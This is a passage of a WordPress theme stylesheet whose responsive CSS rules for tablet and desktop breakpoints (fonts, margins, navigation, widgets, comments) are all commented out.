1.6;*/ /*}*/ /*p,*/ /*address,*/ /*pre,*/ /*hr,*/ /*ul,*/ /*ol,*/ /*dl,*/ /*dd,*/ /*table {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*blockquote {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.6667;*/ /*margin-bottom: 1.6667em;*/ /*margin-left: -1.3333em;*/ /*padding-left: 1.1111em;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*line-height: 1.6;*/ /*}*/ /*pre {*/ /*line-height: 1.2;*/ /*}*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*line-height: 1.5;*/ /*}*/ /*button,*/ /*input {*/ /*line-height: normal;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"],*/ /*.post-password-form input[type="submit"],*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*padding: 0.7917em 1.5833em;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.375em;*/ /*}*/ /*.main-navigation {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*margin: 0 20% 20%;*/ /*}*/ /*.main-navigation a {*/ /*padding: 0.5em 0;*/ /*}*/ /*.main-navigation .menu-item-has-children > a {*/ /*padding-right: 30px;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*}*/ /*.dropdown-toggle {*/ /*height: 24px;*/ /*width: 24px;*/ /*}*/ /*.dropdown-toggle:after {*/ /*font-size: 16px;*/ /*line-height: 24px;*/ /*width: 24px;*/ /*}*/ /*.social-navigation {*/ /*margin: 0 20% 20%;*/ /*}*/ /*.social-navigation ul {*/ /*margin-bottom: -1.6em;*/ /*}*/ /*.social-navigation li {*/ /*width: 25%;*/ /*}*/ /*.social-navigation a {*/ /*height: 3.2em;*/ /*}*/ /*.secondary-toggle {*/ /*display: none;*/ /*}*/ /*.post-password-form label,*/ /*.post-navigation .meta-nav,*/ /*.comment-navigation,*/ /*.image-navigation,*/ /*.author-heading,*/ /*.author-bio,*/ /*.entry-footer,*/ /*.page-links a,*/ /*.page-links span,*/ /*.comment-metadata,*/ /*.pingback .edit-link,*/ /*.comment-list .reply,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.comment-form label,*/ /*.form-allowed-tags,*/ /*.site-info,*/ /*.wp-caption-text,*/ /*.gallery-caption,*/ /*.entry-caption,*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.post-navigation {*/ /*margin: 8.3333% 8.3333% 0;*/ /*}*/ /*.post-navigation a {*/ /*padding: 5% 10%;*/ /*}*/ /*.pagination {*/ /*margin: 8.333% 8.333% 0;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.2em;*/ /*}*/ /*.pagination .page-numbers {*/ /*line-height: 3.2em;*/ /*padding: 0 0.8em;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*height: 48px;*/ /*padding: 0;*/ /*width: 48px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*height: 48px;*/ /*line-height: 48px;*/ /*width: 48px;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-next a:after {*/ /*font-size: 16px;*/ /*top: 0;*/ /*}*/ /*.image-navigation {*/ /*padding: 0 10%;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4em 1.6em 1.6em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4em 0 1.6em 1.6em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*clear: both;*/ /*margin-top: 0.4em;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2em;*/ /*}*/ /*.site-header {*/ /*background-color: transparent;*/ /*border-bottom: 0;*/ /*margin: 20% 0;*/ /*padding: 0 20%;*/ /*}*/ /*.site-branding {*/ /*min-height: 0;*/ /*padding: 0;*/ /*}*/ /*.site-title {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.3636;*/ /*}*/ /*.site-description {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.widget {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*margin: 0 0 20%;*/ /*padding: 0 20%;*/ /*}*/ /*.widget blockquote {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*margin-bottom: 1.5em;*/ /*margin-left: -1.5em;*/ /*padding-left: 1.1667em;*/ /*}*/ /*.widget blockquote p {*/ /*margin-bottom: 1.5em;*/ /*}*/ /*.widget blockquote cite,*/ /*.widget blockquote small {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.widget pre {*/ /*padding: 0.5em;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*padding: 0.5417em 1.0833em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.4583em;*/ /*}*/ /*.widget .wp-caption-text,*/ /*.widget .gallery-caption {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 1.9167;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*padding: 0.4583em 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*margin: 0.4583em 0 0 1em;*/ /*padding-top: 0.4583em;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*}*/ /*.hentry,*/ /*.page-header,*/ /*.page-content {*/ /*margin: 0 8.3333%;*/ /*}*/ /*.hentry {*/ /*padding-top: 8.3333%;*/ /*}*/ /*.hentry + .hentry,*/ /*.page-header + .hentry,*/ /*.page-header + .page-content {*/ /*margin-top: 8.3333%;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 2.4em;*/ /*}*/ /*.entry-header {*/ /*padding: 0 10%;*/ /*}*/ /*.entry-title,*/ /*.widecolumn h2 {*/ /*font-size: 31px;*/ /*font-size: 3.1rem;*/ /*line-height: 1.1613;*/ /*margin-bottom: 1.1613em;*/ /*}*/ /*.entry-content,*/ /*.entry-summary {*/ /*padding: 0 10% 10%;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 31px;*/ /*font-size: 3.1rem;*/ /*line-height: 1.1613;*/ /*margin-top: 1.5484em;*/ /*margin-bottom: 0.7742em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 26px;*/ /*font-size: 2.6rem;*/ /*line-height: 1.3846;*/ /*margin-top: 1.8462em;*/ /*margin-bottom: 0.9231em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.3636;*/ /*margin-top: 2.1818em;*/ /*margin-bottom: 1.0909em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-summary h4,*/ /*.page-content h4,*/ /*.comment-content h4 {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*margin-top: 2.6667em;*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*line-height: 1.2;*/ /*margin-top: 3.2em;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*font-size: 16px;*/ /*top: 5px;*/ /*}*/ /*.author-info {*/ /*margin: 0 10%;*/ /*padding: 10% 0;*/ /*}*/ /*.author-info .avatar {*/ /*height: 36px;*/ /*margin: 0 1.5em 1.5em 0;*/ /*width: 36px;*/ /*}*/ /*.author-link:after {*/ /*font-size: 16px;*/ /*top: 1px;*/ /*}*/ /*.entry-footer {*/ /*padding: 5% 10%;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*top: 0;*/ /*}*/ /*.page-header {*/ /*padding: 4.1666% 8.3333%;*/ /*}*/ /*.page-content {*/ /*padding: 8.3333%;*/ /*}*/ /*.taxonomy-description {*/ /*padding-top: 0.4em;*/ /*}*/ /*.page-title,*/ /*.comments-title,*/ /*.comment-reply-title,*/ /*.post-navigation .post-title {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*}*/ /*.page-links {*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*margin: 0 0.3333em 0.3333em 0;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*top: 0;*/ /*}*/ /*.comments-area {*/ /*margin: 8.3333% 8.3333% 0;*/ /*padding: 8.3333%;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*padding: 1.6em 0;*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6em;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 0.8em;*/ /*}*/ /*.comment-author {*/ /*margin-bottom: 0.4em;*/ /*}*/ /*.comment-author .avatar {*/ /*height: 24px;*/ /*margin-right: 0.8em;*/ /*top: 0;*/ /*width: 24px;*/ /*}*/ /*.comment-metadata .edit-link:before {*/ /*top: 3px;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 5px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*top: 5px;*/ /*left: 3px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-bottom: 2em;*/ /*}*/ /*.comment-list .reply a {*/ /*padding: 0.4167em 0.8333em;*/ /*}*/ /*.comment-form,*/ /*.no-comments {*/ /*padding-top: 1.6em;*/ /*}*/ /*.comment-reply-title small a:before {*/ /*top: -3px;*/ /*}*/ /*.site-footer {*/ /*float: left;*/ /*margin: 0 0 0 35.2941%;*/ /*padding: 0;*/ /*width: 58.8235%;*/ /*}*/ /*.site-info {*/ /*padding: 5% 10%;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.wp-caption,*/ /*.gallery {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.widecolumn {*/ /*margin: 8.3333%;*/ /*padding: 8.3333%;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.5484em;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.375em;*/ /*}*/ /*}*/ /*/!***/ /** 16.5 Desktop Medium 1100px*/ /**!/*/ /*@media screen and (min-width: 68.75em) {*/ /*body,*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.6471;*/ /*}*/ /*button,*/ /*input {*/ /*line-height: normal;*/ /*}*/ /*p,*/ /*address,*/ /*pre,*/ /*hr,*/ /*ul,*/ /*ol,*/ /*dl,*/ /*dd,*/ /*table {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*blockquote {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.75;*/ /*margin-bottom: 1.75em;*/ /*margin-left: -1.05em;*/ /*padding-left: 0.85em;*/ /*}*/ /*blockquote p {*/ /*margin-bottom: 1.75em;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.6471;*/ /*}*/ /*pre {*/ /*line-height: 1.2353;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"],*/ /*.post-password-form input[type="submit"],*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*padding: 0.8214em 1.5714em;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.5em;*/ /*}*/ /*.main-navigation {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.main-navigation a {*/ /*padding: 0.4643em 0;*/ /*}*/ /*.main-navigation .menu-item-has-children > a {*/ /*padding-right: 34px;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*line-height: 1.4583;*/ /*margin-top: 0.25em;*/ /*}*/ /*.dropdown-toggle {*/ /*height: 28px;*/ /*width: 28px;*/ /*}*/ /*.dropdown-toggle:after {*/ /*line-height: 28px;*/ /*width: 28px;*/ /*}*/ /*.social-navigation ul {*/ /*margin-bottom: -1.4706em;*/ /*}*/ /*.social-navigation li {*/ /*width: 20%;*/ /*}*/ /*.social-navigation a {*/ /*height: 2.8824em;*/ /*}*/ /*.post-password-form label,*/ /*.post-navigation .meta-nav,*/ /*.comment-navigation,*/ /*.image-navigation,*/ /*.author-heading,*/ /*.author-bio,*/ /*.entry-footer,*/ /*.page-links a,*/ /*.page-links span,*/ /*.comment-metadata,*/ /*.pingback .edit-link,*/ /*.comment-list .reply,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.comment-form label,*/ /*.form-allowed-tags,*/ /*.site-info,*/ /*.wp-caption-text,*/ /*.gallery-caption,*/ /*.entry-caption,*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.2941em;*/ /*}*/ /*.pagination .page-numbers {*/ /*line-height: 3.2941em;*/ /*padding: 0 0.8235em;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*height: 56px;*/ /*padding: 0;*/ /*width: 56px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*height: 56px;*/ /*line-height: 56px;*/ /*width: 56px;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-next a:after {*/ /*top: 2px;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4118em 1.6471em 1.6471em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4118em 0 1.6471em 1.6471em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*margin-top: 0.4118em;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2353em;*/ /*}*/ /*.site-title {*/ /*font-size: 24px;*/ /*font-size: 2.4rem;*/ /*line-height: 1.1667;*/ /*}*/ /*.site-description {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.widget {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.widget blockquote {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*padding-left: 1.2143em;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*font-size: 14px;*/ /*font-size: 1.4rem;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*padding: 0.75em 1.5em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.5em;*/ /*}*/ /*.widget .wp-caption-text,*/ /*.widget .gallery-caption {*/ /*line-height: 1.4583;*/ /*padding: 0.5833em 0;*/ /*}*/ /*.widget_calendar caption {*/ /*margin: 0 0 1.9286em;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 1.9286;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*padding: 0.4643em 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*margin: 0.4643em 0 0 1em;*/ /*padding-top: 0.4643em;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*line-height: 1.75;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 2.4706em;*/ /*}*/ /*.entry-title,*/ /*.widecolumn h2 {*/ /*font-size: 35px;*/ /*font-size: 3.5rem;*/ /*line-height: 1.2;*/ /*margin-bottom: 1.2em;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 35px;*/ /*font-size: 3.5rem;*/ /*line-height: 1.2;*/ /*margin-top: 1.6em;*/ /*margin-bottom: 0.8em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 29px;*/ /*font-size: 2.9rem;*/ /*line-height: 1.2069;*/ /*margin-top: 1.931em;*/ /*margin-bottom: 0.9655em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 24px;*/ /*font-size: 2.4rem;*/ /*line-height: 1.1667;*/ /*margin-top: 2.3333em;*/ /*margin-bottom: 1.1667em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-summary h4,*/ /*.page-content h4,*/ /*.comment-content h4 {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.4;*/ /*margin-top: 2.8em;*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*line-height: 1.2353;*/ /*margin-top: 3.2941em;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*font-size: 24px;*/ /*top: 2px;*/ /*}*/ /*.author-info .avatar {*/ /*height: 42px;*/ /*margin: 0 1.6471em 1.6471em 0;*/ /*width: 42px;*/ /*}*/ /*.author-link:after {*/ /*top: 3px;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*top: 3px;*/ /*}*/ /*.taxonomy-description {*/ /*padding-top: 0.4118em;*/ /*}*/ /*.page-title,*/ /*.comments-title,*/ /*.comment-reply-title,*/ /*.post-navigation .post-title {*/ /*font-size: 24px;*/ /*font-size: 2.4rem;*/ /*line-height: 1.1667;*/ /*}*/ /*.page-links {*/ /*margin-bottom: 1.4117em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*margin: 0 0.2857em 0.2857em 0;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 20px;*/ /*font-size: 2rem;*/ /*line-height: 1.4;*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*top: 0.0833em;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.4em;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*padding: 1.6471em 0;*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6471em;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 1.1667em;*/ /*}*/ /*.comment-author {*/ /*margin-bottom: 0;*/ /*}*/ /*.comment-author .avatar {*/ /*height: 42px;*/ /*margin-right: 1.64705em;*/ /*top: 5px;*/ /*width: 42px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*top: 7px;*/ /*left: 6px;*/ /*}*/ /*.comment-metadata .edit-link:before {*/ /*top: 6px;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 6px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.comment-list .reply a {*/ /*padding: 0.4286em 0.8571em;*/ /*}*/ /*.comment-form,*/ /*.no-comments {*/ /*padding-top: 1.6471em;*/ /*}*/ /*.comment-reply-title small a:before {*/ /*top: -1px;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.wp-caption,*/ /*.gallery {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6471em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6471em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.6em;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 17px;*/ /*font-size: 1.7rem;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.4117em;*/ /*}*/ /*}*/ /*/!***/ /** 16.6 Desktop Large 1240px*/ /**!/*/ /*@media screen and (min-width: 77.5em) {*/ /*body,*/ /*button,*/ /*input,*/ /*select,*/ /*textarea {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.6842;*/ /*}*/ /*button,*/ /*input {*/ /*line-height: normal;*/ /*}*/ /*p,*/ /*address,*/ /*pre,*/ /*hr,*/ /*ul,*/ /*ol,*/ /*dl,*/ /*dd,*/ /*table {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*blockquote {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.8182;*/ /*margin-bottom: 1.8182em;*/ /*margin-left: -1.0909em;*/ /*padding-left: 0.9091em;*/ /*}*/ /*blockquote p {*/ /*margin-bottom: 1.8182em;*/ /*}*/ /*blockquote cite,*/ /*blockquote small {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.6842;*/ /*}*/ /*pre {*/ /*line-height: 1.2632;*/ /*}*/ /*button,*/ /*input[type="button"],*/ /*input[type="reset"],*/ /*input[type="submit"],*/ /*.post-password-form input[type="submit"],*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*padding: 0.8125em 1.625em;*/ /*}*/ /*input[type="text"],*/ /*input[type="email"],*/ /*input[type="url"],*/ /*input[type="password"],*/ /*input[type="search"],*/ /*textarea {*/ /*padding: 0.5278em;*/ /*}*/ /*.main-navigation {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.main-navigation a {*/ /*padding: 0.5em 0;*/ /*}*/ /*.main-navigation .menu-item-has-children > a {*/ /*padding-right: 38px;*/ /*}*/ /*.main-navigation .menu-item-description {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*line-height: 1.5385;*/ /*margin-top: 0.3077em;*/ /*}*/ /*.dropdown-toggle {*/ /*height: 32px;*/ /*top: 4px;*/ /*width: 32px;*/ /*}*/ /*.dropdown-toggle:after {*/ /*line-height: 32px;*/ /*width: 32px;*/ /*}*/ /*.social-navigation ul {*/ /*margin-bottom: -1.2632em;*/ /*}*/ /*.social-navigation a {*/ /*height: 2.5263em;*/ /*}*/ /*.post-password-form label,*/ /*.post-navigation .meta-nav,*/ /*.comment-navigation,*/ /*.image-navigation,*/ /*.author-heading,*/ /*.author-bio,*/ /*.entry-footer,*/ /*.page-links a,*/ /*.page-links span,*/ /*.comment-metadata,*/ /*.pingback .edit-link,*/ /*.comment-list .reply,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.comment-form label,*/ /*.form-allowed-tags,*/ /*.site-info,*/ /*.wp-caption-text,*/ /*.gallery-caption,*/ /*.entry-caption,*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.pagination .nav-links {*/ /*min-height: 3.3684em;*/ /*}*/ /*.pagination .page-numbers {*/ /*line-height: 3.3684em;*/ /*padding: 0 0.8421em;*/ /*}*/ /*.pagination .prev,*/ /*.pagination .next {*/ /*height: 64px;*/ /*padding: 0;*/ /*width: 64px;*/ /*}*/ /*.pagination .prev:before,*/ /*.pagination .next:before {*/ /*height: 64px;*/ /*line-height: 64px;*/ /*width: 64px;*/ /*}*/ /*.image-navigation .nav-previous a:before,*/ /*.image-navigation .nav-next a:after,*/ /*.comment-navigation .nav-previous a:before,*/ /*.comment-navigation .nav-next a:after {*/ /*font-size: 24px;*/ /*top: -1px;*/ /*}*/ /*blockquote.alignleft,*/ /*.wp-caption.alignleft,*/ /*img.alignleft {*/ /*margin: 0.4211em 1.6842em 1.6842em 0;*/ /*}*/ /*blockquote.alignright,*/ /*.wp-caption.alignright,*/ /*img.alignright {*/ /*margin: 0.4211em 0 1.6842em 1.6842em;*/ /*}*/ /*blockquote.aligncenter,*/ /*.wp-caption.aligncenter,*/ /*img.aligncenter {*/ /*margin-top: 0.4211em;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-caption.alignleft,*/ /*.wp-caption.alignright,*/ /*.wp-caption.aligncenter {*/ /*margin-bottom: 1.2632em;*/ /*}*/ /*.site-title {*/ 